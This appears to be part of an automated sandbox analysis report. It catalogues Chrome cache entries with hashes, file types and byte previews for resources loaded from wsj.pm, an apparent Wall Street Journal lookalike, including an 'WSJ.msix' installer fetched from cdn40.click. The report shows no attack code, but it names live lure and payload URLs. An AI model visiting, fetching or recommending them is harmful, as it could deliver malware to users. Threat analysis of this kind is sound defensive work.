                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:y/pNKuZLrymEgrWrs90sx+lEAd7aHSQBBXRo:yjKuJVWrs90llE0eBlS
                                                                                                                MD5:F8B4DAB12479D584FF82A1BDEEEE1D1B
                                                                                                                SHA1:4413D1B9DEFB607CDCDEA6F680E2EF5A9FBE3358
                                                                                                                SHA-256:0BFDA38967E02F468ABCB39F9EE8C1A0EAB48B2A2BE819E76FD313C71E1CC94C
                                                                                                                SHA-512:33032DEB7557772B1F7D4A02A7E98B673F6EF67D2EE4F32E54CD3D93B41B1F6D870B10FC3D61B1988A18AB66456D63DBDFCE5CA396CFEE0AB92AA75DCDBD04F6
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2
                                                                                                                Preview:wOF2......d..........d~.............................H.`....<..b........^.6.$.....Z.. .....F.........v$.. |O....`...?..#....1..s....IE.l2L.....^...Cn!.@......:z.....,.c...z...J.......Fw...uQ...`;..8L...N..9.i..i..(8.].Q..!.O....pt<..[t...Y.C._....QS..WV.?.~......E`..G....:W.....N....3 v....#.4..6.y.-...%...1X..Q%.+..U..<>&F...mD....r._.l.U...H.r.\.....v..53 4......y5....*[.bses......F]K..Z/z.t.{.yP...\._qa..e.XW."x6...l.gZ....=.G............WB.].$L.(+b.@.xx..Chke!A:.G.....B7.....1...y...T..;%>...t.../m.*...555.._.....X.K.-b..yH.Ev...&s.A7k...o.BB.+x...z.g.-......e....Hp.cQ..c..y?.}...C.a.."v.XV>*.4.V..u..e..~....w&ne.t.]sN..-.|.....nb.!g.^....@..b.&.i........VQ....^.3.s.Zv...F......A.*..N...A.2.>.[........m..tc.[..T0..V67D..O..l.<..........lF.LH....r.Y........?qR_..^.*es..h]..rrz.....KW...U..L.*#...02F..%..-..T2p{Ls<...v.I. %. ..n...._U..>H....Jw)..t9;$..).5g............|...V..TAZ".d.t.I..N.* (7PJq-}J.X.X..a.i....a.3.5.?.S.W.....}@.

                                                                                                                Chrome Cache Entry: 168

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 1200 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):36753
                                                                                                                Entropy (8bit):7.374539144572274
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:WOXKOv1yZpYze15pC9Nnf+1DR+h0xBbZtc9/:WOaOd6Yze1y9Nf+1xK9/
                                                                                                                MD5:39C4A819D34BBC735A64925F6E1B822D
                                                                                                                SHA1:A070B426420A4D71E84EB299F72E2F3EB7CBE2CC
                                                                                                                SHA-256:19F65DAC376257F32E6B3FAF13AFFDB09811F1313B163CE42BD5ABED2BEF3199
                                                                                                                SHA-512:ACD6783EB06EA5EE37A4A0F9675D905D1DE80C59CAA459C185C7164F46D76553ABDA6A329DB827D0CB4FE8D6BF0FBC6F074B9377ED19086447BFA016C4DC5BB4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.PNG........IHDR.......v.....O@{\....sRGB.......@.IDATx.....]U...'.dR'..^&..&1..^.T.W..xU...""..*XbD......p.......(R.DJz'}.&e&m...9q..9..9.<k...|.....................@....@....@....@......6Z.e!.... .... .... .... .. ..A@....@....@....@....0-@.ezx(....@....@....@....@...g....@....@....@....@.......8..@....@....@....@...,....@....@....@....@.....X.....@....@....@....@.....x..@....@....@....@...L..`....C....@....@....@.... ...@....@....@....@....0-@.ezx(....@....@....@....@...g....@....@....@....@.......8..@....@....@....@...,....@....@....@....@.....X.....@....@....@....@.....x..@....@....@....@...L..`....C....@....@....@.... ...@....@....@....@....0-@.ezx(....@....@....@....@...g....@....@....@....@.......8..@....@....@....@...,....@....@....@....@.....X.....@....@....@....@.....x..@....@....@....@...L..`....C....@....@....@.... ...@....@....@....@....0-@.ezx(....@....@....@....@...g....@....@....@....@.......8..@....@....@....@...,....@....@....@....@.....X.....@....@....@....@

                                                                                                                Chrome Cache Entry: 169

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (1425), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):13726
                                                                                                                Entropy (8bit):5.611491041250947
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:vGSWFaMz1uzqb0Dy7cv5dbM8+qr4EI3qHlBALQDRnru1ALQDWnc1/3JoWlWAlMlN:IBeB3DRru13DWc1+LB
                                                                                                                MD5:A792E59D415507F73E161C261512ADF6
                                                                                                                SHA1:77D3292488CD60736256176DCBBED884D588E619
                                                                                                                SHA-256:85E59CB38B4073BBA5EC33B54F07ADB286350E0E8FA8995F16A21E030F83DB4C
                                                                                                                SHA-512:C48E91DFC95D2601977136AA5096EF7CA83E9DBDF857EC5BFD337EB1697EDD3D2D73C925D52835C7710003CC39B8EBAE2625C902A11355DA491200D9492D57BD
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/css/footer.css
                                                                                                                Preview:.style--wsj-footer--1oyfjaSE {.. font-family:Retina.. }.. .style--wsj-footer--1oyfjaSE a:active,.. .style--wsj-footer--1oyfjaSE a:link,.. .style--wsj-footer--1oyfjaSE a:visited {.. color:inherit;.. text-decoration:none;.. outline:none.. }.. .style--wsj-footer--1oyfjaSE a:focus {.. outline:3px solid #0080c3;.. outline-offset:1px.. }.. .style--footer-wrap--2MWbl7sj {.. clear:left;.. background-color:#f4f4f4.. }.. .style--footer-wrap--2MWbl7sj a:hover {.. color:#0274b6.. }.. .style--sector--3YqTinLu {.. margin:0 auto;.. width:1280px.. }.. .style--at12units--1cWlUKQI .style--sector--3YqTinLu {.. width:980px.. }.. .style--module--1TyrWODD {.. margin-left:10px;.. margin-right:10px;.. clear:both;.. box-sizing:border-box.. }.. .style--top-links-wrapper--7aZFm8Cx {.. background-color:#e9e9e9;.. margin-bottom:30px.. }.. .style--top-links--1KnY_aIi {.. height:72px;.. position:relative;.. list-st

                                                                                                                Chrome Cache Entry: 170

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:GIF image data, version 89a, 76 x 76
                                                                                                                Category:dropped
                                                                                                                Size (bytes):7274
                                                                                                                Entropy (8bit):7.394845254952242
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:fdOBkA2/1guZ78IWA6ZPZBS+kQZI7kMaAawJUY6bG:lOl81gl1jTkQWraTY6bG
                                                                                                                MD5:43189FBE5F3EE308149EF9DD02964D9C
                                                                                                                SHA1:DCE4DF89C1B390631D4775A81BD5591119CEE5F9
                                                                                                                SHA-256:8A3D83FE1D0E6F9E14607C7C5B9A880EE18825B475A8F5D29A284BAE6D2E963E
                                                                                                                SHA-512:4BA264CC41F71E853CDC7646649269B7D7E470F50DE28F2C8473B2FB0CDD9CC977044AD9C229DE1D4161C0FCB817293DFA7E4866D0E178E1D3CDE0742080B39D
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:GIF89aL.L...............................lll...sssVVV......qqqXXX\\\YYY........................vvvfffeeettt....yyyIII.............kkkcccTTT......hhhQQQUUU...ppp...gggooo]]]aaaFFFSSS...rrr...WWWHHHJJJOOOwwwxxx}}}ddd.................zzz___@@@........PPP...jjjmmmbbbZZZ[[[LLLiii.........^^^......|||...{{{............```DDD;;;..............~~~nnn.........NNN???.......===.........GGG.................MMM......666.................KKK...uuu.....................<<<BBB......................:::.......................RRR...000............EEE555...AAA.........(((......888....................444......&&&111.....999...222"""...$$$'''>>>CCC***333!!!......)))%%%777---,,,........................+++...... ###............///................................................!.......,....L.L.....u\{.d.'..h,.......D..hP&.@.0.....!...@......c'.. 6...1..&C...Y@...Zp.P%...L$..R)..=p`y......@.q...@...=....`&v.Ul..M.:..D..[c......, .j..P)D17...Q.....^...".../,......O..e.q......,.sFIg.@

                                                                                                                Chrome Cache Entry: 171

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 287x191, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):9586
                                                                                                                Entropy (8bit):7.955142632385518
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:nQPdQF3ztHakymnpTHy4BpC7DFvuP6Aq5bhyqIrokvFWHM7BW8:UgzymnpTSiC3FvuPGbhLILFoQf
                                                                                                                MD5:25CE6FA9798693A805D126956321CA82
                                                                                                                SHA1:3D1DDAE0DE494326B82E7056B371277630AB3634
                                                                                                                SHA-256:6D14CAE3C1B8D3710C1774DA1130CDE2EFC6DF295525A01BA81259583648CFF8
                                                                                                                SHA-512:0AD60AA52ABAC239A6874BD16298243A668DEF78C3E8005CDAE043D3AD56DA0086687380F1D92F8C900711223AE0DC7B6770695A6B4F670BE7F714369439F825
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................=.........................!.1.AQa"q..#2B...3R....r..4....$bs..............................$.......................!1.AQ.a"2Bq............?..[..P..@..q^...@P.Wv.*q#.DDs.V=N[..91..d..E&...R.7..k..s].2E.P...q@.E-E2.Gv..F<..H).......|....J.h*)`.mw).T.M!.....2..)...wj.Y.rk.'..l.{..l.e...Z....(C!.&........I.C.9..iOe.-.....j....Y.F...1,r.&..B^3..ir.c .k...x.....d.....*_....v......R.7.(.^.;hv.G.F.X!...h.b..u.......6f..".JUf..O.U....a.:q.=.......+H.R}.9y.]"....tl..U.G.4.X......FZ....b...e't../..b^l}..uV...g........%...J!.hV.Z<.pET....bu#..U.Z.......sX.d .)...NF)...S.3ah..E..y.wJ....1I....T..1A.r.V^...<`.Ubri..}..!.YN#..jn.....]..9._...v;K.... ...i..:+..n....qR.O..x.Y..z..............{...uG._'<..w.:....F.....vc..yf..t.%..t..Hc...}........$.YQ8.}8....L..,...Fb>#K...;.......By^...&...

                                                                                                                Chrome Cache Entry: 172

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 46896, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):46896
                                                                                                                Entropy (8bit):7.994954897293629
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:7K2xVr44pmE48HYe4rhCILHDiigJXh7DoVJILHcz3UcgXH2MzhhmIZJLC0zv4aJ4:hxVr44pW8HetCILe9XhQJMc7UcgXzzhg
                                                                                                                MD5:24C68AC27C209DA5C83D10B3038C17AF
                                                                                                                SHA1:F0EA85E0E6567A6A4DF2628B535A92580D2F1324
                                                                                                                SHA-256:2AD4A9B9E1D7BDA32834AF951EADBE33F30183272A09C596FEBF458D07CFA916
                                                                                                                SHA-512:7FCF5100FC3010388EC5C2900022711A3C3C184AE599AFC80F40A806ADA851730CC0B5710FF9B6B5C492CE22E5FC921AF8A7151420E03CD8D4AC1360D77D4762
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/RetinaNarr-Light.woff2
                                                                                                                Preview:wOF2.......0......+`...........l.................:..b...<..\.`....x........0..}.6.$..n..z.. ..<.....#[y....>..*.[...m.9.....U..W.]/.<...fA..l\=..a....e.........d!k6...$ .Z|..i...y...SJ...X#.i9.....@..Xk.[..dJ.dJ.L..x_..~8Z....G..S$..>..-.s&.x..9f.r..\..1;j.-R.3.pK...nJ...Y.._tq...(....n..r..m.Wbe.U...3.%.op.,|.K...D....!Q'.p.h.W...4...._A^T....HAg..AUQu...V.PQ...)|e.!w......q.&..;..3;...b(..z......P....j.:.5..?...d.8....Q/v|.O/<sS.!..Y.r.c*f.....d.zS.I.?z#.b.<7.'.b.....L5..}T.iX ~.Y N,R.?.W..bbK...MFU.......8_...{.9Z.b.......x..|...v;....3.6.Vvg<q.so8..|...5..q.ey;./..*Mr.>X.9Y....GL......H%\....8.T..l....X'.H...2.....J.&.E.j....?..s.ds.x......k>..!..E.fC.B..-.%...V".S...T...6K.D....A*.$.....4r...Y..p.J....W..E..nu...m......(..D ...i.J...7....q.^B.R......7.>.{..8....>........d")J.p..A...3..k&.I5.....O`...:r+c.xU.....?.....\i.i\...d......M.........**....H..J.......%1....I.6^....{...x..K......ks).......23...%....I.."..H-..Y*..=..X.R.......dtO^.BE<.#.

                                                                                                                Chrome Cache Entry: 173

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ISO Media, AVIF Image
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):5009
                                                                                                                Entropy (8bit):6.7032773169417945
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:+VjvLQDTvsvBy9nUKUvuoN0CkdpNT0D5MdtbZPAVwzVw5tlCe7Uis3:+VzUsvynUKUv/feYNMtKwSXCe75W
                                                                                                                MD5:AC8211D8A19B370C97FAF7FA4FF7EFB4
                                                                                                                SHA1:D51E894AA80FF13D861664EE9FD86D4FEA58A782
                                                                                                                SHA-256:121E7ECAF100E40B30944EA2D3A88F24AAD67C9647D4B7BF50657378E52816A6
                                                                                                                SHA-512:7054F6C140BEEF680FEF0CFECC18BFDDD7145A8ABBE0EDDE7EB71CBE22B9233F6E104A19679A82AB005E8EC7BB768F07217D126E02B3EEE8CD026353C7A52521
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-647221.avif
                                                                                                                Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................r...(iinf..........infe........av01Color....oiprp...Oipco....ispe.......<...<....pixi............av1C........colrprof....appl....mntrRGB XYZ ...........4acspAPPL....APPL...........................-appl................................................desc...\...bdscm........cprt...\...#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin...,...>chad...l...,mmod.......(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN

                                                                                                                Chrome Cache Entry: 174

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1064965
                                                                                                                Entropy (8bit):7.997699899695652
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:24576:/nGpZCSOG9vMctFkyggn+Qce6X/di+J72iPgnrT:epkzG99tFkyLkei/8+J71IH
                                                                                                                MD5:2BCB8F589CA7F5910883DAD50B7E11DF
                                                                                                                SHA1:9A29D41B5AFEC950F90DAEF45762455C47B7098D
                                                                                                                SHA-256:F015DA1F2ADA32F734B81AA282BEA62840CD84AFAA353CA52D5E2D0C82E705D1
                                                                                                                SHA-512:4E731C5C66BD590D83D10541AB4DCC4717A12067ABBC353790B4FB5E6FFFA854C1C29784F7D9903C58DBF8D730A556AD12CB4CDFB6A48A2420431E3E7E1DFB0C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cdn40.click/files/WSJ.msix
                                                                                                                Preview:PK..-......%.X................Registry.dat.}.|..g..1/A.. ...p...c$...g4.,a.......3.........2ds.. ......r....$..p8.....c.Y......BrYA....m.I.......hF.66.6*.....g}U]].4..Wh.FP......wq.z!....3.7d.........'.V|...s....e..{1....X.....5...e.,k`Y...X....Jh`8...Se......[...v.=...M1y........;<fin'.m..N.....~.n.njD.OX...X...M`..0.....h,....x.j+$.S..y.2.$.h.....>p/@I.W.X.w.Y@[QP.........PC.#....q....>HSV.i.J.........k.....q^.9I.B...}.=e..S.~M........w...b.?...|....VM.@E..o.|...g}..g..../.0..."{_m..nh.M..>.)=n?Y...-.Wt...\.]....%...$.1......zP.... ..._lhG.......l....O...z...nP..~M.J.^./&.%..yx.....o...y.t~..c..A%l?V}....t.....V_"..I&.XzS.H.:Zn.9O7.fhO%..ohk..T.}..o.y.....z*e.r~s.t>.|/N~.}.O.rZ.i....=...t.2.".d<..L.'.Q........m....z.J.UuRF&........s..< ..x.H..2.....(G.c.W...X.o....n.z.....k.Z........Z...n.nF...F........i..B;...@.$..7..L...L.l..R......]....+...c.W~..v-F..?....'..t2.......J.#....V.f.%./..1A.{...b.Z...0.+:V9....*.Q19..?.....a ..w..vt....).[

                                                                                                                Chrome Cache Entry: 175

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 110x62, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1242
                                                                                                                Entropy (8bit):7.4848919715140045
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:Ac1spbhZ4RGxaXBsY6V4bXmLMnPUHiciVhEj0Sx6TxARdG8RG5wnq:AiWbhZ4XBsY6ubXHnPdVe4SwcrRGeq
                                                                                                                MD5:B5CA97D2473416E6EF6EDDEE47097DFB
                                                                                                                SHA1:59C7EA9475797CC44A9494C678C9435DA0082047
                                                                                                                SHA-256:F760308F9CA7561891609C963C8B8FF8C5B2F2B8CD6D188406CBF3F073AD870E
                                                                                                                SHA-512:94A64386DEE8EC33EA261C6557D9F0358B62C5D3F9C613EFD1986E806F786889B0544CC4F5631806C1077FD1C224527D492613A07B1A5E390EBCB31DD97FC517
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-949723.jpeg
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......>.n.."........................................7........................!.1..2AQa..q..."#BR...br.........................................................1..!Aq............?..a.sf.;b...!.........'...QeB....V;.)...A.{....N.....8..H...s...0..=.O.-..\w.mH....L&.G)R..........d.....G%....Y./!...t......R.a...../....Q..zn..,.^M%...^.....O..-....Y.....t..9.|.H..Tg..=..%...w*}.2.. ..Q.....#"....4-Y..:.*T..wa....clv..q...Y.......p........G.E..c)4j.2R..lLC....ntV.C..T...B..w]..aU76..p..(RcqF.k).=..X.;._CZ.c.O.A.c..>.W....j.lW.L{w^x.]=.^D.Zg.........Y..4-Rk.0../#JG.`p(@8~......Y....g`..!..dc..5.RG..f...b3..S^...:GC#.8...PV[.c8q....769..4...7...?....L.U...qK:l..x..x..H..QQ.Wne#.B..F.8f$....I-.......b.A6M......5...AWV.qQ$\K. ......!.#zd..*J`R&.P....w.q...ra.....*...P...Q2...S.....wK:.....P.....A.K.g. ....Q.=..x..E.vz

                                                                                                                Chrome Cache Entry: 176

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):16
                                                                                                                Entropy (8bit):3.75
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Hs4Y:4
                                                                                                                MD5:4724E1B6CD4C657C054FC279728B9389
                                                                                                                SHA1:0E1E1FF0C77E475561A572AF7E2793925194C522
                                                                                                                SHA-256:FC027A34917AA7438F757F2A17E424A2A763C1077FA56A9C5BBA4CD6AEA25CB0
                                                                                                                SHA-512:5740C4C3E186CDCF22FD4E997A9082BC09184764E5ECB9808A0E495CBE6A0819FA9FD104E5D0F221995CBCE8205B0492AA6131F5D8D04E38B64C3CB9F55F6A30
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAmn8WJRrNvrzBIFDTBKud0=?alt=proto
                                                                                                                Preview:CgkKBw0wSrndGgA=

                                                                                                                Chrome Cache Entry: 177

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 63957, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):63957
                                                                                                                Entropy (8bit):7.996533386595805
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:1536:Ot/Zd0fvjdoPYu6zjtT7Ix+Wgf2jybmRAN0/nwNeg7/eycoDUHZ:cdYvjdMkW/mSRa0/Wea+5
                                                                                                                MD5:0C40A7AE21908C50DAB61BA01D106DEB
                                                                                                                SHA1:6FF46C025B40CFB0DA10E874C55636DAFA7A48CE
                                                                                                                SHA-256:3A760AD2462E5115EFB1336E598DD00A47072606DEDBDB0BB0F75747529228F7
                                                                                                                SHA-512:5A09ACF82365820946B1758AA02B13425A0885912B08433830D2EEC2939BFFB79D2F63581E6DE9E20A7EB2CA4B156325AF5C9EC9553E4FC232115411A073ACFB
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/exchange/Exchange-Book.woff2
                                                                                                                Preview:wOF2.............................................:......2..L.`..F..L........t..v.6.$..>..<.. ..e..F..<[.r......gU.e..pc..)R..^...|....57....\T].........m....ye..........F.Cj.g^.K2..e........R+.B...*T!J.\PJ.+!.....q......G..X.u.'...3.[|.....tr.>.F.z.O.g]0.. g.......P..."..V.,...,Ue#)H*y...*,..Q.Q.+...`RT.,.2.8.$$.m..W.*...U..J.......:.*W.H8W9.{.Q:Ij..L5a"a.D9...?..KG.Z].+X.x.@\.F2..Ki.:-..M.kH..c.........ez.(..s.YY.IHB....o....Lm.@.........V...L...IHB.y..Vr.,t9[z[{.|.....g..bI.....=,...n..../(T...>~..}..[78c.J}......,......mPYu..:..J...2..4...p..CF60..Ct..e._.../+.:.qZ47.O.:..0...5..)h.r.#y,oB..~.....3^.v\R5.L.('}.f..B...C.. #ne!T....5g2..P.......J.....(..{.*%$s.)9.]H.kp...O.....6..,.......S... ....n...x.$.zRM.*..Hwz..j..S.:$...z(...>x{...V...!..q.:.1Q7+....k..1E.H...{.....H@j1$f..|..@B.....B.=./o...l.-:..R.~...|."......'T...o.l.......t..(.H....i.'.....9....!N.'$!PJ $.\.I.B..V...-..P..(U9w...DKE?y5F9'.*.F...n...N...a~.E.R9.....EkU1...

                                                                                                                Chrome Cache Entry: 178

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ISO Media, AVIF Image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5009
                                                                                                                Entropy (8bit):6.7032773169417945
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:+VjvLQDTvsvBy9nUKUvuoN0CkdpNT0D5MdtbZPAVwzVw5tlCe7Uis3:+VzUsvynUKUv/feYNMtKwSXCe75W
                                                                                                                MD5:AC8211D8A19B370C97FAF7FA4FF7EFB4
                                                                                                                SHA1:D51E894AA80FF13D861664EE9FD86D4FEA58A782
                                                                                                                SHA-256:121E7ECAF100E40B30944EA2D3A88F24AAD67C9647D4B7BF50657378E52816A6
                                                                                                                SHA-512:7054F6C140BEEF680FEF0CFECC18BFDDD7145A8ABBE0EDDE7EB71CBE22B9233F6E104A19679A82AB005E8EC7BB768F07217D126E02B3EEE8CD026353C7A52521
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................r...(iinf..........infe........av01Color....oiprp...Oipco....ispe.......<...<....pixi............av1C........colrprof....appl....mntrRGB XYZ ...........4acspAPPL....APPL...........................-appl................................................desc...\...bdscm........cprt...\...#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin...,...>chad...l...,mmod.......(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN

                                                                                                                Chrome Cache Entry: 179

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 220 x 220, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):50600
                                                                                                                Entropy (8bit):7.982273521260046
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:D22uLgbSATuk1CQuaS9Ow15EmS82+fk5IqImN5mPv01K:D22uLgbgksQuaNGEmHgdImNbo
                                                                                                                MD5:53786BE73B415DF9E5C3F76D49C1C1AA
                                                                                                                SHA1:CA8EB138A7539B0F597A3E69FE6589C3E84813C6
                                                                                                                SHA-256:AFF5B236949464B3D3A2C40C8352DEEFEE45C1ED2FE071AE3C47DE0C423A3F6F
                                                                                                                SHA-512:93855748EC8AFCA9B6CD6E28202F38440042D757D06B6D2233CE7BA90A9D44C528CD681E84FCD4F032F91CDE46C84893E20D4192DCF7A1CAD3F491AAE88BE65A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.PNG........IHDR..............Z.....iCCPicc..X..WP.......<..f....$J.@rN.....A.r0!.+...HR...\pu....(.DA..,......l..{..s.un.|..O..U_wU_..6.49......$$..|.l.A.!L.= ..(@.|8;%......`u/.[...du......kQ8.........n.........>....I.....0xA.!.(g.#.q.*G}..{.|...#.DJ.W&.\.L.^ev4/.@.....I.T...^....W...&ry.\......^...'..........Fo,...D..omK9......oM..........c.]...O.i..o.....B..I..%P.m0..0.kp.W..?..M..hH..d@...(.R8..P....mp....\..p...(<........`.A..BE.$".. Z...B,.....A..0$.ID.\d.R..!.H=....E.!.a..2..!.".Q.JA..,...,..uC..h...f...^..m@O...%.&:.N./.E.`.0b...6....xbB0...f...S.i..az0......<.....c.Xm.9...ec.....j..l'..{.;.].~.Qq28-........e..p..&\...n.7.{.....jx..3>...............).".@.$h.,...pB*..PE8I.@.!L......D..#1..H.#V.[......q.$LR!..<I.R....H.!.&M..."d5....K.I.$..........(...x.......8%pM`R...F..QB)i.......7T*U.jM...R.R....O....:......5...#...HB*B6B....*.......&.......o...>+<..(B.....I.).i...2K#.Ti.4.-.v.v.6E...vt6}...~.>..3....XF..G..cA.&j(. .)Z#z^tB.#.*."./V"vZlL....

                                                                                                                Chrome Cache Entry: 180

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JSON data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):23
                                                                                                                Entropy (8bit):3.6211755429194716
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:YM0uRn:YM0uR
                                                                                                                MD5:8183B9A40CF91DC91EE64E402122F07C
                                                                                                                SHA1:3F2EAD7013B407FC83ECFDB34B2120003D88982A
                                                                                                                SHA-256:B3849D6557B393391A2530A78375643A147278269DB19B8855798A1DEC085E53
                                                                                                                SHA-512:2B2BD2D0F215820ED342BA8E6766EE2B97CC0CD215831FFC587F83A8E4D47AEA23DADF7C1EB6CF8388E6CF4FB77DFA82BDB06115B05437EFA4A94C2ADED08E77
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:{"ip":"185.152.66.230"}

                                                                                                                Chrome Cache Entry: 181

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 47636, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):47636
                                                                                                                Entropy (8bit):7.994599343008316
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:ZnznFuR2eBLellJaf9ACWX/SwbHEAU4J6WN3FEly5K2rylJ2y/TdmTVQlIemWmhO:x82YElM9o6we4J60FElydreJ2y/TkTVM
                                                                                                                MD5:0606FB011EB4F71A05F334A661A66C71
                                                                                                                SHA1:F9475834FED11BBB30A9930665A06D0EF59A9C45
                                                                                                                SHA-256:497F169256FF4F0AF835F665A2D105F02E0F12BF078572D12DCBAF6D25328B8D
                                                                                                                SHA-512:8073B133F8F23D07AA4E7747EFB389BF7B6D5DE792E909C78B3E2328CE05BE9FD43772F62D4EB44FA4ED9940FD827D5439A40046835F93E2DCA794DFA658C003
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/RetinaNarr-Book.woff2
